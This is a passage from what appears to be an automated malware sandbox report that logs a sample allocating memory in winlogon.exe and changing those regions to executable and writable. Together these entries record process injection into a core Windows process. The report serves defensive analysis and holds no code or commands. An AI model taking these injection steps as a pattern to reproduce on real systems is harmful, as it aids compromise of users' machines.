Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE98000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF18000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF38000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF58000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF78000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF98000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB4000 protect: page read and writeJump to behavior
Changes memory attributes in foreign processes to executable or writable
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA78000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA98000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB18000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB38000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB58000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB78000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB98000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC18000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC38000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC58000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC78000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC98000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD18000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD38000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD58000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD78000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD98000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF8000 protect: page execute and read and writeJump to behavior
